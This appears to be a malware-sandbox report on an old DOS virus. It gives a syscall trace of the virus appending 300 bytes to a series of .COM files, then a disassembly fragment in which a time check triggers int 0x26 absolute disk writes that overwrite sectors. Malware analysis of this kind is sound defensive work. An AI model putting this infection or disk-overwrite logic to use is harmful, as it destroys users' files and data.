Sample viewer

vx.netlux.org/Virus.DOS.Rape.Paradis.300

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:32:43.019127859Z 26 PC: 12a91 | Set disk transfer address
2018-12-17T22:32:43.020406501Z 78 PC: 12a9a | Find first file
2018-12-17T22:32:43.027999318Z 67 PC: 12aa7 | Get or set file attributes
2018-12-17T22:32:43.032585962Z 61 PC: 12ab0 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:32:43.045577228Z 63 PC: 12abf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:32:43.054348424Z 66 PC: 12ad1 | Move file pointer
2018-12-17T22:32:43.05607499Z 64 PC: 12a69 | Write file or device (Write 300 bytes on handle 5)
2018-12-17T22:32:43.073591652Z 66 PC: 12ae8 | Move file pointer
2018-12-17T22:32:43.076112883Z 64 PC: 12af4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:32:43.087043386Z 62 PC: 12afa | Close file
2018-12-17T22:32:43.096922157Z 79 PC: 12a9a | Find next file
2018-12-17T22:32:43.101135351Z 67 PC: 12aa7 | Get or set file attributes
2018-12-17T22:32:43.106147304Z 61 PC: 12ab0 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:32:43.114194672Z 63 PC: 12abf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:32:43.122150684Z 66 PC: 12ad1 | Move file pointer
2018-12-17T22:32:43.132295275Z 64 PC: 12a69 | Write file or device (Write 300 bytes on handle 5)
2018-12-17T22:32:43.135840572Z 66 PC: 12ae8 | Move file pointer
2018-12-17T22:32:43.137528029Z 64 PC: 12af4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:32:43.14187475Z 62 PC: 12afa | Close file
2018-12-17T22:32:43.152110061Z 79 PC: 12a9a | Find next file
2018-12-17T22:32:43.155553613Z 67 PC: 12aa7 | Get or set file attributes
2018-12-17T22:32:43.164483284Z 61 PC: 12ab0 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:32:43.172864712Z 63 PC: 12abf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:32:43.180565325Z 66 PC: 12ad1 | Move file pointer
2018-12-17T22:32:43.183750978Z 64 PC: 12a69 | Write file or device (Write 300 bytes on handle 5)
2018-12-17T22:32:43.187173633Z 66 PC: 12ae8 | Move file pointer
2018-12-17T22:32:43.189386763Z 64 PC: 12af4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:32:43.194298918Z 62 PC: 12afa | Close file
2018-12-17T22:32:43.204058175Z 79 PC: 12a9a | Find next file
2018-12-17T22:32:43.207494949Z 67 PC: 12aa7 | Get or set file attributes
2018-12-17T22:32:43.212674691Z 61 PC: 12ab0 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:32:43.220383044Z 63 PC: 12abf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:32:43.228660939Z 66 PC: 12ad1 | Move file pointer
2018-12-17T22:32:43.230866514Z 64 PC: 12a69 | Write file or device (Write 300 bytes on handle 5)
2018-12-17T22:32:43.235153788Z 66 PC: 12ae8 | Move file pointer
2018-12-17T22:32:43.238031399Z 64 PC: 12af4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:32:43.242662297Z 62 PC: 12afa | Close file
2018-12-17T22:32:43.253016736Z 79 PC: 12a9a | Find next file
2018-12-17T22:32:43.257339648Z 67 PC: 12aa7 | Get or set file attributes
2018-12-17T22:32:43.262513756Z 61 PC: 12ab0 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:32:43.277251034Z 63 PC: 12abf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:32:43.284558841Z 66 PC: 12ad1 | Move file pointer
2018-12-17T22:32:43.286765582Z 64 PC: 12a69 | Write file or device (Write 300 bytes on handle 5)
2018-12-17T22:32:43.291363192Z 66 PC: 12ae8 | Move file pointer
2018-12-17T22:32:43.294074688Z 64 PC: 12af4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:32:43.297724932Z 62 PC: 12afa | Close file
2018-12-17T22:32:43.307168119Z 79 PC: 12a9a | Find next file
2018-12-17T22:32:43.311055036Z 67 PC: 12aa7 | Get or set file attributes
2018-12-17T22:32:43.315712911Z 61 PC: 12ab0 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:32:43.32318311Z 63 PC: 12abf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:32:43.331916369Z 66 PC: 12ad1 | Move file pointer
2018-12-17T22:32:43.333755453Z 64 PC: 12a69 | Write file or device (Write 300 bytes on handle 5)
2018-12-17T22:32:43.343604116Z 66 PC: 12ae8 | Move file pointer
2018-12-17T22:32:43.346249561Z 64 PC: 12af4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:32:43.353944229Z 62 PC: 12afa | Close file
2018-12-17T22:32:43.363435725Z 79 PC: 12a9a | Find next file
2018-12-17T22:32:43.367705298Z 67 PC: 12aa7 | Get or set file attributes
2018-12-17T22:32:43.372508506Z 61 PC: 12ab0 | Open file (Filename = 'PAH.COM')
2018-12-17T22:32:43.380059524Z 63 PC: 12abf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:32:43.388012189Z 66 PC: 12ad1 | Move file pointer
2018-12-17T22:32:43.390046142Z 64 PC: 12a69 | Write file or device (Write 300 bytes on handle 5)
2018-12-17T22:32:43.39341349Z 66 PC: 12ae8 | Move file pointer
2018-12-17T22:32:43.395504067Z 64 PC: 12af4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:32:43.398994763Z 62 PC: 12afa | Close file
2018-12-17T22:32:43.408794163Z 79 PC: 12a9a | Find next file
2018-12-17T22:32:43.41196423Z 67 PC: 12aa7 | Get or set file attributes
2018-12-17T22:32:43.417635527Z 61 PC: 12ab0 | Open file (Filename = 'TEST.COM')
2018-12-17T22:32:43.425303324Z 63 PC: 12abf | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:32:43.432807714Z 79 PC: 12a9a | Find next file
2018-12-17T22:32:43.437058493Z 44 PC: 12b02 | Get time 0x12b02: cmp dl, 5
0x12b05: ja 0x12b2a
0x12b07: jmp 0x12b09
0x12b09: mov ah, 0x2c
0x12b0b: int 0x21
0x12b0d: cmp dl, 0x50
0x12b10: ja 0x12b14
0x12b12: jmp 0x12b1f
0x12b14: cli
0x12b15: mov ah, 2
0x12b17: cdq
0x12b18: mov cx, 0x100
0x12b1b: int 0x26
0x12b1d: jmp 0x12b2a
0x12b1f: cli
0x12b20: mov ah, 3
0x12b22: cdq
0x12b23: mov cx, 0x100
0x12b26: int 0x26
0x12b28: jmp 0x12b2a